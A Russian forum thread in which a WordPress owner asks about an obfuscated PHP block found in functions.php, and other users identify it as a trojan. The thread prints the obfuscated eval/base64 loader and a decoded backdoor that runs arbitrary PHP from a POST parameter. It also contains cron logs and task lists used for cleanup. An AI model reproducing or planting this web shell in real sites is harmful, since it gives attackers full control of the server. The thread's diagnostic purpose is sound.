• Вопрос без рабочей ссылки на проблему считается риторическим. Без ссылки и скриншота - провокацией!
  • Темы озаглавленные с маленькой буквы или капсом удаляются без предупреждения!

Function.php странный код

Image CMS

Macstuff

Форумчанин
#1
Доброго времени суток.
Последние дни просто немеренное кол-во регистраций ботов с yahoo ящиков...
Начал искать решение и нашел вариант с переименованием wp-login.php и там было указано вставить код в function.php. В начале файла я увидел странный код, дешифровать его не смог, после удаления страницы не открывались вовсе, просто белый экран.
Что это?
Спасибо

PHP:
 $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
 
#2
Это троян.
Части кода не хватает, того что в скобках
base64_decode(strtr(substr($O0O000,$OO0000*2),substr($O0O000,$OO0000,$OO0000),substr($O0O000,0,$OO0000)));
 

joy66

Форумчанин
#3
Доброго времени суток.
Последние дни просто немеренное кол-во регистраций ботов с yahoo ящиков...
Начал искать решение и нашел вариант с переименованием wp-login.php и там было указано вставить код в function.php. В начале файла я увидел странный код, дешифровать его не смог, после удаления страницы не открывались вовсе, просто белый экран.
Что это?
Спасибо
вот это тебе предлагают вставить
PHP:
<?php
$fukq = @$_GET['fukq'];
if($fukq == 't'){
  echo(@eval($_POST['fuckyou4321']));
  exit;
  }
echo apiRequest();
function apiRequest(){
    if(@$_GET['op'] == 'check')
        {
         return "connectjbmoveisok";
         exit();
        }
}
?>
 

rikitiki

Специалист
Местный
#4
А как этот код действует? Сам functions.php запускает или начинает действовать, когда админ или посетитель на сайт заходят, активируя тем самым functions.php?
 

joy66

Форумчанин
#5
нет сайт выполнит любой php код , который ему пришлют. То есть теоретически кто-то извне может полностью распоряжаться твоей учетной записью у хостера
 

Macstuff

Форумчанин
#6
Код удалил, но сейчас появилась другая проблема. Каким то образом появляются записи без текста, например, photoshop c4 crack... админ один, пароль сменил
 

searchingman

Гуру
Местный
#7

joy66

Форумчанин
#8
Код удалил, но сейчас появилась другая проблема. Каким то образом появляются записи без текста, например, photoshop c4 crack... админ один, пароль сменил
Дело в том, что как правило код такой предназначен для внедрения чего-то еще. Например модернизация существующих скриптов, добавления своих файлов тд. Так что без ревизии файлов сайта не обойтись. Неплохо для начала логи апача посмотреть сопоставив со времени добавления записи. Посмотреть какие задачи у wp-cron прописаны.
 

Macstuff

Форумчанин
#9
Дело в том, что как правило код такой предназначен для внедрения чего-то еще. Например модернизация существующих скриптов, добавления своих файлов тд. Так что без ревизии файлов сайта не обойтись. Неплохо для начала логи апача посмотреть сопоставив со времени добавления записи. Посмотреть какие задачи у wp-cron прописаны.
Вот что удалось найти через cpanel, а как понять что это за задания?

Код:
Host: 2a03:c980::1:20:16
/wp-cron.php?doing_wp_cron=1445218820.8918900489807128906250
    Http Code: 200    Date: Oct 19 04:40:20    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445222212.1818981170654296875000
    Http Code: 200    Date: Oct 19 05:36:52    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445224000.7439529895782470703125
    Http Code: 200    Date: Oct 19 06:06:40    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445226476.7103641033172607421875
    Http Code: 200    Date: Oct 19 06:47:56    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445230362.6335949897766113281250
    Http Code: 200    Date: Oct 19 07:52:42    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445230685.1213068962097167968750
    Http Code: 200    Date: Oct 19 07:58:05    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445231859.2687690258026123046875
    Http Code: 200    Date: Oct 19 08:17:39    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445232822.1764910221099853515625
    Http Code: 200    Date: Oct 19 08:33:42    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445236321.2021179199218750000000
    Http Code: 200    Date: Oct 19 09:32:01    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?doing_wp_cron=1445236859.4292368888854980468750
    Http Code: 200    Date: Oct 19 09:40:59    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=queue,bounce&silent=1
    Http Code: 200    Date: Oct 19 10:02:48    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
/wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=bounce&silent=1
    Http Code: 200    Date: Oct 19 10:28:51    Http Version: HTTP/1.1    Size in Bytes: 0
    Referer: -
    Agent: WordPress/4.2.5; http://prettysimple.ru
 

joy66

Форумчанин
#10
Это выполнение заданий wp-cron, которые зафиксировались логом веб сервера. Это есть у всех, у кого принудительно wp-cron не отключен. Важно узнать что это за задания.
 

joy66

Форумчанин
#11
Я не знаю, есть ли отдельный плагин для просмотра cron задач. У меня стоит плагин рассылок mailpress там есть инструмент для просмотра запланированных задач и их удаления .

хотя похоже есть http://art-storona.ru/dl/wp-admin/plugin-install.php?tab=search&s=cron
 
Последнее редактирование:

Macstuff

Форумчанин
#12
С помощью Advanced Cron Manager вытащил список заданий.

wp_cache_gc_watcher
hourly In 40 минут
19.10.2015 14:32:42 Execute
wp_scheduled_auto_draft_delete

daily In 5 часов
19.10.2015 18:58:26 Execute
wp_maybe_auto_update

twicedaily In 6 часов
19.10.2015 19:58:00 Execute
woocommerce_tracker_send_event
daily In 7 часов
19.10.2015 21:21:17 Execute
woocommerce_cleanup_sessions
twicedaily In 7 часов
19.10.2015 21:21:17 Execute
wp_cache_full_preload_hook
single In 9 часов
19.10.2015 23:18:41 Execute
updraft_backup
daily In 11 часов
20.10.2015 00:56:15 Execute
wp_version_check

twicedaily In 12 часов
20.10.2015 01:47:31 Execute
wp_update_plugins

twicedaily In 12 часов
20.10.2015 01:47:31 Execute
wp_update_themes

twicedaily In 12 часов
20.10.2015 01:47:31 Execute
execute_periodic_drobox_backup
daily In 13 часов
20.10.2015 03:00:00 Execute
wp_cache_gc
daily In 13 часов
20.10.2015 03:00:00 Execute
woocommerce_scheduled_sales
daily In 16 часов
20.10.2015 06:00:00 Execute
wp_scheduled_delete

daily In 24 часа
20.10.2015 13:47:35 Execute
wp_cache_full_preload_hook
single In 1 месяц
30.11.2015 19:24:04 Execute
 

joy66

Форумчанин
#13
да вроде ничего подозрительного. Но с другой стороны зловредный код может выполняться и внутри полезного задания.
 

joy66

Форумчанин
#14
вот какие-то странные обращения к крону. опять же без анализа файлов сайта не обойтись
/wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=queue,bounce&silent=1
/wp-cron.php?3ef3c53f4a5dc95b6bf962f54028e241&action=wysija_cron&process=bounce&silent=1
 
Сверху Снизу